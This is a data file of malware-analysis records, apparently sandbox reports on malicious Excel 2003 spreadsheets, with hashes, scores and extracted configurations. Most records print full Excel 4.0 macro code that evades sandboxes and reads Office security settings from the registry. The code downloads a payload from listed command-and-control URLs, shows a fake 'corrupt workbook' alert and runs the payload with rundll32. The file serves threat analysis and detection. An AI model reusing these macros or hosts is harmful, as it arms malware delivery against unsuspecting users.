{"version":"0.2","sample":{"sample":"","kind":"file","target":"8bc6991350a20df29288fdb4c382742679c504dbaf00e1498b7e96eca35dd48b"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8bc6991350a20df29288fdb4c382742679c504dbaf00e1498b7e96eca35dd48b","filesize":225280,"md5":"b12a142c66757a4cae9b3d80a3254353","sha1":"5700248ae32654a6503788d17559fe74422a6393","sha256":"8bc6991350a20df29288fdb4c382742679c504dbaf00e1498b7e96eca35dd48b","sha512":"0700565f24fe418a7c41f57c23e710a3ba6a119e629d2879de13f180a88417835e6f54f421346e6e5f2509e28dc392e97febf0895adc82008c70adad114bd77a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8bc6991350a20df29288fdb4c382742679c504dbaf00e1498b7e96eca35dd48b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kIUZmpRTg2\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8bf685f834dfd7ed048ed096b7511f0df953f6c2e24c50c1f0439d75e8724109"},"analysis":{"reported":"2020-04-09T16:17:34Z","score":10},"files":[{"filename":"8bf685f834dfd7ed048ed096b7511f0df953f6c2e24c50c1f0439d75e8724109","filesize":206336,"md5":"ea0de2583a351e6f1143ea65a5fb49a6","sha1":"7dadfcd8b8239653fc9cb8783369ed01631306ab","sha256":"8bf685f834dfd7ed048ed096b7511f0df953f6c2e24c50c1f0439d75e8724109","sha512":"e7830bc03824dd15def3060eabe44909728c11520dcd12e8c280f5545c00e3073e4e046acf36589609370ea74b9750f8d3c7f75b489d349c4256ba03d5c6c36a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8bf685f834dfd7ed048ed096b7511f0df953f6c2e24c50c1f0439d75e8724109.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rwzBa6OKvd\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8bfcc322896428ede193cc128efa46aa0d35e937ef4a8b9a74f2119999b50931"},"analysis":{"reported":"2020-04-09T16:17:34Z","score":10},"files":[{"filename":"8bfcc322896428ede193cc128efa46aa0d35e937ef4a8b9a74f2119999b50931","filesize":170496,"md5":"452afa461e5141268c00444734bfdaa2","sha1":"4499e56f6310f80adfd55b1a8086f042dd6e1ac0","sha256":"8bfcc322896428ede193cc128efa46aa0d35e937ef4a8b9a74f2119999b50931","sha512":"6c3c0a5c9c41f84d2851c317e880372bd97b8cd7bc2338dc00e745612aea27f2e8180ba3f2f7fb9242b4c9b5cb8794642c388306d18c915d1cee58670c08237e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8bfcc322896428ede193cc128efa46aa0d35e937ef4a8b9a74f2119999b50931.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xVR6qiODlM\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8c17eeb4e5dd4dc7e3583a528b64d19b93cff399610a88ad79ad463405e54478"},"analysis":{"reported":"2020-04-09T16:17:34Z","score":10},"files":[{"filename":"8c17eeb4e5dd4dc7e3583a528b64d19b93cff399610a88ad79ad463405e54478","filesize":112128,"md5":"b08c108ab2938f19392f9e56577ea380","sha1":"723231484824e6dc5e3a796717f2c6b82338b141","sha256":"8c17eeb4e5dd4dc7e3583a528b64d19b93cff399610a88ad79ad463405e54478","sha512":"c16553244824c3dfad97188ac2ce093b9dd203d34f902c4197d92bb75fad0f32645732b972a9286c8d73896806feeb803a72eb72694fcd3980b4838fe1a8ec0d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8c17eeb4e5dd4dc7e3583a528b64d19b93cff399610a88ad79ad463405e54478.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8c21f75b784f025eda599e6aaad9d94cb15e757bf54576d446e327494cc83798"},"analysis":{"reported":"2020-04-09T16:17:34Z","score":10},"files":[{"filename":"8c21f75b784f025eda599e6aaad9d94cb15e757bf54576d446e327494cc83798","filesize":167936,"md5":"f3426eb6d6c1ae2c7da9542c74b58100","sha1":"64753a187d38db0aaefa412b1772093d5e9ac810","sha256":"8c21f75b784f025eda599e6aaad9d94cb15e757bf54576d446e327494cc83798","sha512":"ed7f8b80de6e77dc5d93b9f14c0cc8fcead918a91944a145dd30fd2460c5df1929681224fead6a4300640837f6b8e1b906befcfc9c93aabfea6cce14df24dade","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8c21f75b784f025eda599e6aaad9d94cb15e757bf54576d446e327494cc83798.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wMpb06JE7g\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8c34bb1967e4876c7b45e4aa754d956537d27f42bd877272459d794b57ee8355"},"analysis":{"reported":"2020-04-09T16:17:35Z","score":10},"files":[{"filename":"8c34bb1967e4876c7b45e4aa754d956537d27f42bd877272459d794b57ee8355","filesize":170496,"md5":"76dfa0bb3f28e7bbc970869a45e2bdcf","sha1":"2ce4409707869cd53d2cf28e8f86d36b914f66cf","sha256":"8c34bb1967e4876c7b45e4aa754d956537d27f42bd877272459d794b57ee8355","sha512":"c438804292a23485924b701bda61b3857032f23a55509cb4c57122bfc6fd2fce97bab40836369e86fcbd39ec689de16e8209f9c61bc7355447a3c4ca84c4be30","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8c34bb1967e4876c7b45e4aa754d956537d27f42bd877272459d794b57ee8355.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1z2enQqjHS\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8c441eb803c5206d44ec40ecc83dcb9e8dfc41249bd0d9056724006337cc2aad"},"analysis":{"reported":"2020-04-09T16:17:35Z","score":10},"files":[{"filename":"8c441eb803c5206d44ec40ecc83dcb9e8dfc41249bd0d9056724006337cc2aad","filesize":214528,"md5":"8cb294353e0a86708ca8fd906186efa7","sha1":"66f867611c00d093d313bd3a07f449398ce9de28","sha256":"8c441eb803c5206d44ec40ecc83dcb9e8dfc41249bd0d9056724006337cc2aad","sha512":"2d45fe9333a7e183bdf2afe87793f22d96548c08c0406324fd6b397c80c83c2659ddbce442574a2982a0c2ee9df5c3f9ceaf608960f79ce60c8534cc6ce3b4ea","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8c441eb803c5206d44ec40ecc83dcb9e8dfc41249bd0d9056724006337cc2aad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"86weio0wyb\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8c54b3a5cdba073009630b520ae088830ee53db7fcf5502c81fdc9916d3a7812"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8c54b3a5cdba073009630b520ae088830ee53db7fcf5502c81fdc9916d3a7812","filesize":209920,"md5":"635fd16f69b7352f8f04c5a1d67332ec","sha1":"bd386e68ba3a20bf9e0812ac11e3a99b49a15628","sha256":"8c54b3a5cdba073009630b520ae088830ee53db7fcf5502c81fdc9916d3a7812","sha512":"b97387912f3d551992624dd6acd8ecffbdb250166baf2ceef00b27d6c6d479a76acf14947d66489fb913f7de7f899ef78409ad3842469f96ffa30a367e63d3d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8c54b3a5cdba073009630b520ae088830ee53db7fcf5502c81fdc9916d3a7812.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"l8uz0ETEto\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8c6341298c86e9c261855e14e8c06b33af428d1cedeb64250eca80bdfc934af2"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8c6341298c86e9c261855e14e8c06b33af428d1cedeb64250eca80bdfc934af2","filesize":112128,"md5":"98242a91f9cfb8087cedf2a9e1203c85","sha1":"0e6828e35f08220ddfeb70432d3d8ddecee2c64a","sha256":"8c6341298c86e9c261855e14e8c06b33af428d1cedeb64250eca80bdfc934af2","sha512":"2e33f6c4f943daf281a28fc3b4a61c5a3cd295609593f5bf2df6683fb03ba1a0ad411a76a287bf5ddeac25faf5a99a7b5e4d03d0e13535523b76d4e1a96bf1cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8c6341298c86e9c261855e14e8c06b33af428d1cedeb64250eca80bdfc934af2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8c69be543a38845b29d3836509dcd84811c781a45e2e54590804f04444df78b0"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8c69be543a38845b29d3836509dcd84811c781a45e2e54590804f04444df78b0","filesize":185344,"md5":"b3249aa0023b4f5e9e91bf2b9bf3243f","sha1":"18a52e1bc66dbc571f52782fc97b29f04e2d5488","sha256":"8c69be543a38845b29d3836509dcd84811c781a45e2e54590804f04444df78b0","sha512":"9fcd9d2a70ee5b78d1b4d1d0d0ec232e9e39dcff7485382ef1dab6e265026d7d70ffcddd97dd464c50df417ea74c3b85bce85d0a4d7a7626d039f6154e2ccb33","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8c69be543a38845b29d3836509dcd84811c781a45e2e54590804f04444df78b0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8c92c42938d312323cb7e24b55935c79db52b20005b6cfb9fa7936e197bad251"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8c92c42938d312323cb7e24b55935c79db52b20005b6cfb9fa7936e197bad251","filesize":147968,"md5":"c3be3b37dcfcb2495083a0101a875b5c","sha1":"4df5ad23d5685b16e4e1dc4df49edd26ca382c3c","sha256":"8c92c42938d312323cb7e24b55935c79db52b20005b6cfb9fa7936e197bad251","sha512":"544e9f69c7d918ca01059f5e5c7fbf9c157c3db024c9587cede5adb82e2ec88aa44c66ffc9f83e3f6684af5f519bf76ec44fc2df4c772e7f56633f426c816b36","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8c92c42938d312323cb7e24b55935c79db52b20005b6cfb9fa7936e197bad251.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"zdM3rGwpWp\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8c9e5dd5537522cefb6c55cd65e98de99407f372ef3f38211632db4e63577870"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8c9e5dd5537522cefb6c55cd65e98de99407f372ef3f38211632db4e63577870","filesize":209920,"md5":"002ec8f95c0080bc4b264cc6cf1fa37a","sha1":"127b0436950997ffd765948f36601106f45079cf","sha256":"8c9e5dd5537522cefb6c55cd65e98de99407f372ef3f38211632db4e63577870","sha512":"e002510c6286d7c9ba140b99524f4dd7042cd81aa8056c89046895f9b007018354dca8bc0d37d420d553d7176ecfd05dea44e04688719637d0fd6c16d79ee5d2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8c9e5dd5537522cefb6c55cd65e98de99407f372ef3f38211632db4e63577870.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gImA6V1hJ2\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8cb2a70b942cbb834c8489b54b9d2adb0afdf5194aa1dfbb1376f078749369c1"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8cb2a70b942cbb834c8489b54b9d2adb0afdf5194aa1dfbb1376f078749369c1","filesize":221184,"md5":"05ac40f17fe62baf0f665971a6708440","sha1":"ecf8fbf37a37d2884dcfb971689c864c8d66377d","sha256":"8cb2a70b942cbb834c8489b54b9d2adb0afdf5194aa1dfbb1376f078749369c1","sha512":"074b2f8b1266a0214a686bfaccb7467c75197388f0617dbfe3affd3eb76e1e61866643d3b889c91ff8cc9a46b2b60ce314101dc308341f6030db29d4e1b993ca","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8cb2a70b942cbb834c8489b54b9d2adb0afdf5194aa1dfbb1376f078749369c1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YXiVyR6nUu\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8cb49d38e1a44f1495a13e4276ac0e933655e57ff8d5b98f9b53e3fbcf6a906d"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8cb49d38e1a44f1495a13e4276ac0e933655e57ff8d5b98f9b53e3fbcf6a906d","filesize":177152,"md5":"ef810c99b4a9a6d3a14578d9d510428f","sha1":"538a15d829fea8f3696a8aeec5ef3bb3baf62c87","sha256":"8cb49d38e1a44f1495a13e4276ac0e933655e57ff8d5b98f9b53e3fbcf6a906d","sha512":"79bab2ab20587353a93ebfec9d0270c3c7175baac3ef7f3fc687ef3760fc265f17db18c24843cbb0fb411805c529b934f85fdb5d013515900fb4b47581233c3f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8cb49d38e1a44f1495a13e4276ac0e933655e57ff8d5b98f9b53e3fbcf6a906d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6eLo0jpfG9\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8cc44ba5b31f743137f95ee22c51bee7f3a19a98cee2c5f479a11f4eba27eb90"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8cc44ba5b31f743137f95ee22c51bee7f3a19a98cee2c5f479a11f4eba27eb90","filesize":185344,"md5":"fa7f8e9103f458af3f3eba8859111ec0","sha1":"6fa35c016c3149c788054d897cacf92454b7b225","sha256":"8cc44ba5b31f743137f95ee22c51bee7f3a19a98cee2c5f479a11f4eba27eb90","sha512":"dc8cca9f145759e268e55d81dc66d90a7525407cdaa557384b664432d19aaaea64f384af4458162c0a729a9e2978016915c36bdcd5ae3d9bd07d0b0f8c2ac054","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8cc44ba5b31f743137f95ee22c51bee7f3a19a98cee2c5f479a11f4eba27eb90.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
